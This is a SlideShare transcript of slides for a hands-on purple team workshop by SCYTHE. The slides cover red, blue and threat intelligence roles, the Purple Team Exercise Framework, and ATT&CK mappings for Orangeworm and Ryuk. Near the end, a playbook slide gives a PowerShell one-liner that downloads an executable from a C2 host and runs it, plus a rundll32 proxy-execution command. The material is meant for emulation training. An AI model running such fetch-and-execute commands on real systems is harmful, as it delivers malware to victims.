SlideShare une entreprise Scribd logo

SCYTHE Purple Team Workshop with Tim Schulz

Jorge Orchilles
Jorge Orchilles

Join Tim Schulz, Adversary Emulation Lead at SCYTHE, for a three hour Hands-On Purple Team Workshop on Wednesday, March 10, 2021! ***REGISTRATION REQUIRED*** ***Use a real email address*** In this three hour hands-on workshop you will play the role of Cyber Threat Intelligence, the red team, and the blue team. We have set up an isolated environment for each attendee to go through a Purple Team Exercise. Attendees will: - Learn the basics of Command and Control (C2) - Consume Cyber Threat Intelligence from a known adversary - Extract adversary behaviors/TTPs - Play the Red Team by creating adversary emulation plans - Emulate the adversary with SCYTHE 3.2 in a small environment consisting of a domain controller, member server, and a Linux system - Play the Blue Team and look for Indicators of Compromise - Use Wireshark to identify heartbeat and jitter - Enable Sysmon configurations to detect adversary behavior - All mapped to MITRE ATT&CK - Have FUN! What do you need? All you need is a web browser on a workstation/laptop (no iPads, sorry). If you want to come better prepared, download, read, and watch the free Purple Team Exercise Framework (PTEF) and webcast: https://www.scythe.io/ptef https://www.scythe.io/library/ptef-workshop How will it work? We are using VMware learning platform to give everyone their own isolated environment. This means we need your real email upon registration so we can provision your environment before the start of the workshop.

Technologie
1  sur  59
Télécharger pour lire hors ligne
@teschulz Hands-On Purple Team Workshop #PurpleTeam @scythe_io @teschulz
@teschulz Tim Schulz ● Adversary Emulation Lead @ SCYTHE ● Six years @ Sandia National Labs & MITRE ○ Adversary Emulation ○ Red Team ○ Purple Team ○ ICS ● Open Source Intelligence Gathering ● Digital Forensics Training 2
@teschulz Hands-On Workshop Format ● Brand new lab environment for you to play CTI, Red Team, and Blue Team ○ Consume CTI, emulate, and then defend against Orangeworm and Ryuk ● Built on VMware Learning Platform ○ Everyone should have received an email with a unique URL ● Lecture to introduce key concepts ● 3 total hours to play in the lab environment - self paced manual ● 4 Systems ○ Unicorn - Windows member server you login to and can compromise ○ SCYTHE - the industry leading adversary emulation attack platform ○ SANS Slingshot C2 Matrix Edition - a bunch of C2s pre-installed and VECTR ○ UnicornDC1 - a domain controller 3
@teschulz Takeaways ● Learning about purple teaming! ● Taking it back to work ○ Understanding the value and sharing it with others ● Equipping you with knowledge and tooling ○ Purple Team Exercise Framework ○ #ThreatThursday ○ SCYTHE Enterprise Platform ● Getting CPE credits (yeah, we know, you gotta get them) 4
@teschulz What are we learning? ● What is Purple Team? ● Ethical Hacking Evolution ● Framework/Methodology ● Cyber Threat Intelligence ● Preparation ● Purple Team Exercise Flow ● Lessons Learned ● Hands-On Workshop 5
@teschulz What is Purple Team? A Purple Team is a virtual team where the following teams work together: ● Cyber Threat Intelligence - team to research and provide threat TTPs ● Red Team - offensive team in charge of emulating adversaries ● Blue Team - the defenders. Security Operations Center (SOC), Hunt Team, Digital Forensics and Incident Response (DFIR), and/or Managed Security Service Provides (MSSP) 6
@teschulz Purple… how hard can it be? 7
@teschulz Red and Blue just work together... 8
@teschulz How we think it will go 9
@teschulz How it may go 10
@teschulz Purple Case Study - Scenario ● 6 week Purple Team Exercise - Assumed Breach scenario ● SCYTHE was hired to perform all 3 roles (red, blue, CTI) ● Challenge: $0 spend on new technology ○ Only tuning current security controls 11
@teschulz Purple Case Study - Threats Week 1 - Baseline testing: access, C2, understand controls Week 2 - APT19: low sophistication Chinese threat actor Week 3 - Buhtrap: medium sophistication Russian threat actor Week 4 - APT33: medium sophistication Iranian threat actor Week 5 - APT3: high sophistication Chinese threat actor Week 6 - Free Play: red team plan based on previous weeks 12
@teschulz Purple Case Study - Baseline 13 ● 94% of Adversary Behavior was undetected ● 3 test cases detected by current controls ● 1 test case blocked Baseline Result Known threats have the ability to achieve their objective without being detected
@teschulz Purple Case Study - Results 14 ● $0 technology spend to achieve 64% detection rate ● Enabled telemetry (Sysmon) ● Created logic for alerts on End State Result Known threats will be detected and responded to before achieving objective
@teschulz All Offensive Security is about Providing Value
@teschulz Ethical Hacking Maturity Model ● Common Vulnerability and Exposures != Tactics, Techniques, and Procedures ● Mature organizations operate under “Assume Breach” ○ Some vulnerability will not be patched before it is exploited ○ Some user will fall for social engineering and execute payload or provide credentials ○ What do we do then? ● Testing technology is not enough: People, Process, and Technology https://www.scythe.io/library/scythes-ethical-hacking-maturity-model 16 Vulnerability Scanning Vulnerability Assessment Penetration Testing Red Team Purple Team Adversary Emulation
@teschulz Red Team ● Definition: ○ Emulate Tactics, Techniques, and Procedures (TTPs) to test people, processes, and technology ● Goal: ○ Make Blue Team better ○ Test Assumptions ○ Train and measure whether blue teams' detection and response policies, procedures, and technologies are effective 17 https://medium.com/@jorgeorchilles/ethical-hacking-definitions-9b9a6dad4988 ● Effort: ○ Manual ● Frequency: ○ Intelligence-led (new exploit, tool, or TTP) ● Customer: ○ Blue Teams “The practice of looking at a problem or situation from the perspective of an adversary” – Red Team Journal 1997
@teschulz Blue Team ● The defenders in an organization entrusted with identifying and remediating attacks. ○ Generally associated with Security Operations Center or Managed Security Service Provider (MSSP), Hunt Team, Incident Response, and Digital Forensics. ○ Really, it is everyone's responsibility! ● Goal: Identify, contain, and eradicate attacks ● Effort: Manual ● Frequency: 24/7 ● Customer: Entire organization 18 https://medium.com/@jorgeorchilles/ethical-hacking-definitions-9b9a6dad4988 ● Log ○ Relevant Events ○ Locally ○ Central Log Aggregator ● Alert ○ Severity ● Respond ○ Process ○ People ○ Automation
@teschulz Adversary Emulation ● Definition: ○ A type of Red Team exercise where the Red Team emulates how an adversary operates, following the same tactics, techniques, and procedures (TTPs), with a specific objective similar to those of realistic threats or adversaries ○ May be non-blind a.k.a Purple Team ● Goal: ○ Emulate an adversary attack chain or scenario ● Effort: ○ Manual; SCYTHE is changing that ● Customer: ○ Entire organization 19 https://medium.com/@jorgeorchilles/ethical-hacking-definitions-9b9a6dad4988
@teschulz TOWARD A PURPLE TEAM
@teschulz Purple Team Exercises 21 ● Virtual, functional team where teams work together to measure and improve defensive security posture ○ CTI provides threat actor with capability, intent, and opportunity to attack ○ Red Team creates adversary emulation plan ○ Tabletop discussion with defenders about the attacker tactics, techniques, and procedures (TTPs) and expected defenses ○ Emulation of each adversary behavior (TTP) ○ Blue Team look for indicators of behavior ○ Red and Blue work together to create remediation action plan ● Repeat exercises to measure and improve people, process, and technology
@teschulz When to Purple Team? ● Train the organization’s defenders (Blue Team) ● Test the processes between security teams ● Test attack chains/TTPs that have not been tested before ● Preparation/Replay of a Red Team Engagement ● Foster a collaborative culture within the security organization 22
@teschulz Framework & Methodology 23 ● Cyber Kill Chain – Lockheed Martin ● Unified Cyber Kill Chain – Paul Pols ● Financial/Regulatory Frameworks ○ CBEST Intelligence Led Testing ○ Threat Intelligence-Based Ethical Red Teaming ○ Red Team: Adversarial Attack Simulation Exercises ○ Intelligence-led Cyber Attack Simulation Testing ○ A Framework for the Regulatory Use of Penetration Testing in the Financial Services Industry ● Purple Team Exercise Framework (PTEF) ● Testing Framework:
@teschulz Cyber Kill Chain 24
@teschulz Cyber Kill Chain 25
@teschulz MITRE ATT&CK https://attack.mitre.org/ 26
@teschulz Purple Team Exercise Framework Download the Framework now so you can follow along: https://scythe.io/ptef 27
@teschulz Roles and Responsibilities Title Role Responsibility Head of Security Sponsor Approve Purple Team Exercise and Budget Cyber Threat Intelligence Sponsor Cyber Threat Intelligence Red Team & Blue Team Managers Sponsor Preparation: Define Goals, Select Attendees Red Team Attendee Preparation, Exercise Execution Blue Team - SOC, Hunt Team, DFIR Attendee Preparation, Exercise Execution Project Manager Exercise Coordinator Lead point of contact throughout the entire Purple Team Exercise. Responsible to ensure Cyber Threat Intelligence is provided. Ensures all Preparation steps are taken prior to Exercise Execution. During Exercise Execution, record minutes, notes, action items, and feedback. Send daily emails with those notes as well as guidance for what’s planned for the next day. Compile and deliver Lessons Learned. 28
@teschulz Sponsors (convince them about Purple Team) ● Approve ○ Purple Team Exercise ○ Goals and Scope ○ Budget $$$ ● Members of various teams out of BAU ○ Cyber Threat Intelligence ○ Red Team ○ Security Operations Center ○ Hunt Team ○ Digital Forensics ○ Incident Response 29
@teschulz Time Requirements ● Purple Team Exercises can run for 2 hours to multiple weeks of mostly hands on keyboard work between Red Team and Blue Teams ● Preparation time is based on the defined goals, guidance or constraints set by Sponsors, and emulated adversary’s TTPs 30 Preparation Exercise Lessons Learned Days-Weeks Hours-Days-Weeks TBD
@teschulz Cyber Threat Intelligence 31 ATT&CKing the Status Quo: Threat-Based Adversary Emulation with MITRE ATT&CK - Katie Nickels and Cody Thomas
@teschulz Types of Cyber Threat Intelligence 32 David Bianco: http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html
@teschulz Extract TTPs 33 S0129 – AutoIT T1068 – Exploitation for Privilege Escalation S0194 - PowerSploit T1003 - Credential Dumping IP Address S0002 - Mimikatz S0192 - Pupy Hash Value T1086 - Powershell
@teschulz ATT&CK Navigator 34
@teschulz Analyze & Organize 35 Tactic Description Description Description of adversary Objective Adversary objectives and goals Command and Control Technique ID - Technique Name - Details Initial Access Technique ID - Technique Name - Details Execution Technique ID - Technique Name - Details Defense Evasion Technique ID - Technique Name - Details Discovery Technique ID - Technique Name - Details Privilege Escalation Technique ID - Technique Name - Details Persistence Technique ID - Technique Name - Details Credential Access Technique ID - Technique Name - Details Exfiltration Technique ID - Technique Name - Details
@teschulz #ThreatThursday ● Introduce Adversary ● Consume CTI and map to MITRE ATT&CK ● Present Adversary Emulation Plan ● Share the plan on SCYTHE Community Threat Github ○ https://github.com/scythe-io/community-threats/ ● Emulate Adversary ● How to defend against adversary ● All available to the community for free: https://www.scythe.io/threatthursday 36
@teschulz Orangeworm 37 Tactic Description Description Orangeworm is a group that has targeted organizations in the healthcare sector in the United States, Europe, and Asia since at least 2015 for corporate espionage. C2 T1071 - Application Layer Protocol; T1071.001 - Web Protocols; T1008 - Fallback Channel Execution T1218 - Signed Binary Proxy Execution; T1218.011 - Rundll32; T1059 - Command and Scripting Interpreter; T1059.003 - Windows Command Shell; T1569 - System Services; T1569.002 - Service Execution Defense Evasion T1036 - Masquerading; T1036.004 - Masquerade Task or Service; T1027 - Obfuscated Files or Information; T1027.001 - Binary Padding; T1070 - Indicator Removal on Host; T1070.004 - File Deletion; T1070.005 - Network Share Connection Removal; T1140 - Deobfuscate/Decode Files or Information Discovery T1087 - Account Discovery; T1087.001 - Local Account; T1087.002 - Domain Account; T1201 - Password Policy Discovery; T1069 - Permission Groups Discovery; T1069.002 - Domain Groups; T1069.001 - Local Groups; T1057 - Process Discovery; T1018 - Remote System Discovery; T1082 - System Information Discovery; T1016 - System Network Configuration Discovery T1049 - System Network Connections Discovery; T1033 - System Owner/User Discovery; T1007 - System Service Discovery T1083 - File and Directory Discovery;T1124 - System Time Discovery; T1135 - Network Share Discovery Persistence T1136.001 - Local Account; T1136.002 - Domain Account; T1543.003 - Windows Service Lateral Movement T1021 - Remote Services; T1021.002 - SMB/Windows Admin Shares; T1105 - Ingress Tool Transfer; T1570 - Lateral Tool Transfer https://www.scythe.io/library/threatthursday-orangeworm
@teschulz Logistics 38 ● Pick a location ● Virtual or Remote? ○ Virtual: Choose a Platform (Zoom, GoToMeeting, etc) ○ For physical locations: SOC locations are ideal as SOC Analysts, Hunt Team, and Incident Response are generally physically present ■ Obtain travel approval from sponsors ■ Plan to arrive a day early ■ Training room or large conference room ● Each attendee should have workstation with media output or screen sharing to show current screen to other participants
@teschulz Target Systems Provision production systems for exercise that represent the organization ● Endpoint Operation Systems ○ Standard endpoints - 2 of each (Windows 10, Linux, macOS) ○ Physical systems ○ Virtual Desktop Infrastructure ○ Terminal Services/Citrix ● Server Operating Systems in Environment ○ Windows Servers ○ *nix Servers ○ Include Virtual and Cloud Servers ● 39
@teschulz Security Tools Request the target systems have production security tools: ● Anti-Virus/Anti-Malware/Anti-Exploit ● Endpoint Detection & Response (EDR) ● Forensic Tools ● Image acquisition ● Live forensics ● Ensure flow of traffic goes through standard, production network-based devices such as firewalls and proxy logs 40
@teschulz SOC/Hunt Team Preparation ● Validate security tools are reporting to production security tools from the target systems ● Ensure attack infrastructure is accessible through proxy/outbound controls ● Ensure attack infrastructure is being decrypted (TLS decryption/interception) ● Verify allowlists and notify Red Team ● Work with Red Team as payloads and C2 are tested prior to exercise on non-exercise systems ● Threat Hunting Playbooks - https://threathunterplaybook.com/introduction.html 41
@teschulz DFIR Preparation ● Create an exercise case as per the DFIR process ○ This will allow tagging artifacts and following normal processes without flagging any suspicious activity (e.g. pulling memory from a system that does not have a formal case) ○ Ensure the target systems are not segmented or wiped as they will be used throughout the exercise. It is worth noting that DFIR results serve as a great resource for Cyber Threat Intelligence. ● Ensure the correct forensic tools are deployed on the target systems ● Install Live Forensic Tools for efficiency during Purple Team Exercise. For example: ○ Sysmon ○ Processmon 42
@teschulz Kick Off the Exercise ● Sponsor kicks off the exercise ● Motivate the attendees ● Go over the flow of the exercise 43
@teschulz Exercise Flow 1. Cyber Threat Intelligence, Exercise Coordinator, and/or Red Team presents the adversary, TTPs, and technical details: ○ Adversary behavior ○ Procedure ○ Tool used ○ Attack Vector ○ Delivery Method ○ Privilege gained 2. Purple Team discussion of expected controls based on TTP ○ SOC: Any logs or alerts for this TTP ○ Hunt Team: Any Hunt Cases for this TTP ○ DFIR: Documented methods to identify if TTP was leveraged 44
@teschulz Exercise Flow 3. Red Team executes the TTP ○ Provides attacker IP ○ Provides target ○ Provides exact time ○ Shows the attack on projector 4. SOC, Hunt, and DFIR follow process to identify evidence of TTP ○ Time should be monitored to meet expectation and move exercise along 45
@teschulz Exercise Flow 5. Share screen if TTP was identified, received alert, logs, or forensics a. Time to detect b. Time to receive alert c. Red Team stops TTP d. Show on screen TTP evidence stopped e. Red Team runs TTP again 6. Document results - what worked and what did not 7. Are there any short term adjustments that can increase visibility? a. Implement adjustment b. Red Team repeats TTP 8. Document any feedback and/or Action Items for TTP 9. Repeat for next TTP 46
@teschulz 47
@teschulz Lessons Learned ● At least one dedicated Exercise Coordinator should be assigned to take minutes, notes, action items, and feedback ● Daily emails should be sent to all attendees and sponsors with minutes, action items, and plan for the next day ● The Exercise Coordinator is responsible for the creation of a Lessons Learned document following each exercise ● A feedback request should be sent to all attendees on the last day of the Purple Team Exercise to obtain immediate feedback, while it is fresh on attendee’s minds ● Lessons Learned documents should be completed and sent to Sponsors and Attendees less than 2 weeks after the exercise has concluded 48
@teschulz Determine Tools to Use - C2 Matrix ● Google Sheet of C2s ● https://www.thec2matrix.com/ ● Find ideal C2 for your needs ● https://howto.thec2matrix.com ● SANS Slingshot C2 Matrix VM ● @C2_Matrix 49
@teschulz SCYTHE ● Enterprise-Grade platform for Adversary Emulation ○ Creating custom, controlled, synthetic malware ○ Can be deployed on-premises or your cloud (does not call home) ● Emulate known threat actors against an enterprise network ○ Consistently execute adversary behaviors (TTPs) ○ Continually assess security controls ○ Decreased evaluation time of security technologies ○ Identify blind spots for blue teams ○ Force-multiplier for red team resources ○ Measure and improve response of people and process 50
@teschulz Features & Capabilities ● Enterprise Command and Control (C2) ○ HTTP(S), DNS, SMB, Twitter, Stego ● Automation ○ Build cross-platform synthetic malware (Windows, Linux, macOS) ○ Emulate chosen adversary behaviors (TTPs) consistently ● Largest, public library of Adversary Emulation Plans ○ https://github.com/scythe-io/community-threats ● Reports ○ HTML and CSV Reports ○ Executive Summary ○ ATT&CK Heat Map ○ ATT&CK Navigator JSON ● Integrations ○ Atomic Red Team ○ SIEM (Splunk and Syslog) ○ PlexTrac - automated report writing and tracking ○ VECTR - for tracking and showing value 51
@teschulz NEW: Client Host (Stage 1) 52 ● Mature organizations are implementing application control (allow-listing) ● Our customers operate under “Assume Breach” ○ Initial Access will occur at some point ○ Instead of fighting against AV and EDR for execution, why not allow-list the initial execution? ● Client Host a.k.a. Stage 1 Executable ○ Single binary that can be used to start any other campaign/threat ○ Can be allow-listed ○ Can be signed with organization’s code signing cert! ○ Can only run/connect to respective customer SCYTHE instance
@teschulz NEW: Navigator & NIST-800 Mapping ● Exporting campaigns to ATT&CK Navigator JSON now current (v8 and v4.1) ● Added new report for MITRE ATT&CK to NIST-800 Mapping 53
@teschulz NEW: Create your own Techniques ● You can create custom modules: ○ https://github.com/scythe-io/sdk ● You can create custom threats (attack chains) ● Now you can create and save custom techniques! 54
@teschulz Other new features ● Single Sign On (SSO) via OpenID Connect ● When elevating privileges, new flag to either kill original process or not ● Added support for Linux payloads in “hardened” environments ● Added additional proxy support flags for Windows 55
@teschulz Playbooks Create Campaigns in SCYTHE beforehand ● HTTPS - 10 second heartbeat ○ User Execution: Malicious File (T1204.002) ● Orangeworm ○ Signed Binary Proxy Execution: Rundll32 (T1218.011) ■ rundll32.exe ServiceLogin.dll,PlatformClientMain ● Ryuk ○ Command and Scripting Interpreter: PowerShell (T1059.001) ■ $myscriptblock={$url="https://scythe/ServiceLogin?active=xdHu2K8hG0yvEzMMC-AR7 g&b=false";$wc=New-Object System.Net.WebClient;$output="C:UsersPublicscythe_payload.exe";$wc.DownloadFil e($url,$output);C:UsersPublicscythe_payload.exe};Invoke-Command -ScriptBlock $myscriptblock; 56
@teschulz Hands On Time! 57
@teschulz 58 Save the Date - Friday, April 9, 2021 Come hear the best from our clients and friends at our second annual UniCon. UniCon is a free conference for the entire purple team: security researchers, developers, red teamers, blue teamers, and digital forensics and incident responders.
@teschulz 59 store.scythe.io

Recommandé

Purple Team Exercises - GRIMMCon
Purple Team Exercises - GRIMMConPurple Team Exercises - GRIMMCon
Purple Team Exercises - GRIMMCon
Jorge Orchilles
 
Purple Team Exercise Hands-On Workshop #GrayHat
Purple Team Exercise Hands-On Workshop #GrayHatPurple Team Exercise Hands-On Workshop #GrayHat
Purple Team Exercise Hands-On Workshop #GrayHat
Jorge Orchilles
 
How to Plan Purple Team Exercises
How to Plan Purple Team ExercisesHow to Plan Purple Team Exercises
How to Plan Purple Team Exercises
Haydn Johnson
 
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Jorge Orchilles
 
Adversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSEAdversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSE
Jorge Orchilles
 
So you want to be a red teamer
So you want to be a red teamerSo you want to be a red teamer
So you want to be a red teamer
Jorge Orchilles
 
Purple Team Use Case - Security Weekly
Purple Team Use Case - Security WeeklyPurple Team Use Case - Security Weekly
Purple Team Use Case - Security Weekly
Jorge Orchilles
 
Red teaming probably isn't for you
Red teaming probably isn't for youRed teaming probably isn't for you
Red teaming probably isn't for you
Toby Kohlenberg
 

Recommandé

Purple Team Exercises - GRIMMCon
Purple Team Exercises - GRIMMConPurple Team Exercises - GRIMMCon
Purple Team Exercises - GRIMMCon
Jorge Orchilles
 
Purple Team Exercise Hands-On Workshop #GrayHat
Purple Team Exercise Hands-On Workshop #GrayHatPurple Team Exercise Hands-On Workshop #GrayHat
Purple Team Exercise Hands-On Workshop #GrayHat
Jorge Orchilles
 
How to Plan Purple Team Exercises
How to Plan Purple Team ExercisesHow to Plan Purple Team Exercises
How to Plan Purple Team Exercises
Haydn Johnson
 
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Jorge Orchilles
 
Adversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSEAdversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSE
Jorge Orchilles
 
So you want to be a red teamer
So you want to be a red teamerSo you want to be a red teamer
So you want to be a red teamer
Jorge Orchilles
 
Purple Team Use Case - Security Weekly
Purple Team Use Case - Security WeeklyPurple Team Use Case - Security Weekly
Purple Team Use Case - Security Weekly
Jorge Orchilles
 
Red teaming probably isn't for you
Red teaming probably isn't for youRed teaming probably isn't for you
Red teaming probably isn't for you
Toby Kohlenberg
 
Purple Team Exercise Framework Workshop #PTEF
Purple Team Exercise Framework Workshop #PTEFPurple Team Exercise Framework Workshop #PTEF
Purple Team Exercise Framework Workshop #PTEF
Jorge Orchilles
 
Cyber Purple Teaming: Uniting Blue and Red Teams - B Sides San Antonio - Albe...
Cyber Purple Teaming: Uniting Blue and Red Teams - B Sides San Antonio - Albe...Cyber Purple Teaming: Uniting Blue and Red Teams - B Sides San Antonio - Albe...
Cyber Purple Teaming: Uniting Blue and Red Teams - B Sides San Antonio - Albe...
Denim Group
 
Purple Teaming with ATT&CK - x33fcon 2018
Purple Teaming with ATT&CK - x33fcon 2018Purple Teaming with ATT&CK - x33fcon 2018
Purple Teaming with ATT&CK - x33fcon 2018
Christopher Korban
 
SANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
SANS Purple Team Summit 2021: Active Directory Purple Team PlaybooksSANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
SANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
Mauricio Velazco
 
Red team and blue team in ethical hacking
Red team and blue team in ethical hackingRed team and blue team in ethical hacking
Red team and blue team in ethical hacking
Vikram Khanna
 
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CKTracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CK
MITRE ATT&CK
 
Building an InfoSec RedTeam
Building an InfoSec RedTeamBuilding an InfoSec RedTeam
Building an InfoSec RedTeam
Dan Vasile
 
Red team Engagement
Red team EngagementRed team Engagement
Red team Engagement
Indranil Banerjee
 
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
MITRE ATT&CK
 
Red Team Framework
Red Team FrameworkRed Team Framework
Red Team Framework
👀 Joe Gray
 
Purple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Purple Team - Work it out: Organizing Effective Adversary Emulation ExercisesPurple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Purple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Jorge Orchilles
 
Adversary Emulation - Red Team Village - Mayhem 2020
Adversary Emulation - Red Team Village - Mayhem 2020Adversary Emulation - Red Team Village - Mayhem 2020
Adversary Emulation - Red Team Village - Mayhem 2020
Jorge Orchilles
 
Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement Matrice
Vishal Kumar
 
Adversary Emulation and the C2 Matrix
Adversary Emulation and the C2 MatrixAdversary Emulation and the C2 Matrix
Adversary Emulation and the C2 Matrix
Jorge Orchilles
 
The Rise of the Purple Team
The Rise of the Purple TeamThe Rise of the Purple Team
The Rise of the Purple Team
Priyanka Aash
 
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE - ATT&CKcon
 
8.8 Las Vegas - Adversary Emulation con C2 Matrix
8.8 Las Vegas - Adversary Emulation con C2 Matrix8.8 Las Vegas - Adversary Emulation con C2 Matrix
8.8 Las Vegas - Adversary Emulation con C2 Matrix
Jorge Orchilles
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
Sunny Neo
 
Purple team is awesome
Purple team is awesomePurple team is awesome
Purple team is awesome
Sumedt Jitpukdebodin
 
Knowledge for the masses: Storytelling with ATT&CK
Knowledge for the masses: Storytelling with ATT&CKKnowledge for the masses: Storytelling with ATT&CK
Knowledge for the masses: Storytelling with ATT&CK
MITRE ATT&CK
 
Purple Team Exercise Workshop December 2020
Purple Team Exercise Workshop December 2020Purple Team Exercise Workshop December 2020
Purple Team Exercise Workshop December 2020
Jorge Orchilles
 
Cuddling the Cozy Bear Emulating APT29
Cuddling the Cozy Bear Emulating APT29Cuddling the Cozy Bear Emulating APT29
Cuddling the Cozy Bear Emulating APT29
Jorge Orchilles
 

Contenu connexe

Tendances

Purple Team Exercise Framework Workshop #PTEF
Purple Team Exercise Framework Workshop #PTEFPurple Team Exercise Framework Workshop #PTEF
Purple Team Exercise Framework Workshop #PTEF
Jorge Orchilles
 
Cyber Purple Teaming: Uniting Blue and Red Teams - B Sides San Antonio - Albe...
Cyber Purple Teaming: Uniting Blue and Red Teams - B Sides San Antonio - Albe...Cyber Purple Teaming: Uniting Blue and Red Teams - B Sides San Antonio - Albe...
Cyber Purple Teaming: Uniting Blue and Red Teams - B Sides San Antonio - Albe...
Denim Group
 
SANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
SANS Purple Team Summit 2021: Active Directory Purple Team PlaybooksSANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
SANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
Mauricio Velazco
 
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CKTracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CK
MITRE ATT&CK
 
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
MITRE ATT&CK
 
Red Team Framework
Red Team FrameworkRed Team Framework
Red Team Framework
👀 Joe Gray
 
Adversary Emulation and the C2 Matrix
Adversary Emulation and the C2 MatrixAdversary Emulation and the C2 Matrix
Adversary Emulation and the C2 Matrix
Jorge Orchilles
 
Knowledge for the masses: Storytelling with ATT&CK
Knowledge for the masses: Storytelling with ATT&CKKnowledge for the masses: Storytelling with ATT&CK
Knowledge for the masses: Storytelling with ATT&CK
MITRE ATT&CK
 

Tendances (20)

Purple Team Exercise Framework Workshop #PTEF
Purple Team Exercise Framework Workshop #PTEFPurple Team Exercise Framework Workshop #PTEF
Purple Team Exercise Framework Workshop #PTEF
 
Cyber Purple Teaming: Uniting Blue and Red Teams - B Sides San Antonio - Albe...
Cyber Purple Teaming: Uniting Blue and Red Teams - B Sides San Antonio - Albe...Cyber Purple Teaming: Uniting Blue and Red Teams - B Sides San Antonio - Albe...
Cyber Purple Teaming: Uniting Blue and Red Teams - B Sides San Antonio - Albe...
 
Purple Teaming with ATT&CK - x33fcon 2018
Purple Teaming with ATT&CK - x33fcon 2018Purple Teaming with ATT&CK - x33fcon 2018
Purple Teaming with ATT&CK - x33fcon 2018
 
SANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
SANS Purple Team Summit 2021: Active Directory Purple Team PlaybooksSANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
SANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
 
Red team and blue team in ethical hacking
Red team and blue team in ethical hackingRed team and blue team in ethical hacking
Red team and blue team in ethical hacking
 
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CKTracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CK
 
Building an InfoSec RedTeam
Building an InfoSec RedTeamBuilding an InfoSec RedTeam
Building an InfoSec RedTeam
 
Red team Engagement
Red team EngagementRed team Engagement
Red team Engagement
 
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
 
Red Team Framework
Red Team FrameworkRed Team Framework
Red Team Framework
 
Purple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Purple Team - Work it out: Organizing Effective Adversary Emulation ExercisesPurple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Purple Team - Work it out: Organizing Effective Adversary Emulation Exercises
 
Adversary Emulation - Red Team Village - Mayhem 2020
Adversary Emulation - Red Team Village - Mayhem 2020Adversary Emulation - Red Team Village - Mayhem 2020
Adversary Emulation - Red Team Village - Mayhem 2020
 
Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement Matrice
 
Adversary Emulation and the C2 Matrix
Adversary Emulation and the C2 MatrixAdversary Emulation and the C2 Matrix
Adversary Emulation and the C2 Matrix
 
The Rise of the Purple Team
The Rise of the Purple TeamThe Rise of the Purple Team
The Rise of the Purple Team
 
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
 
8.8 Las Vegas - Adversary Emulation con C2 Matrix
8.8 Las Vegas - Adversary Emulation con C2 Matrix8.8 Las Vegas - Adversary Emulation con C2 Matrix
8.8 Las Vegas - Adversary Emulation con C2 Matrix
 
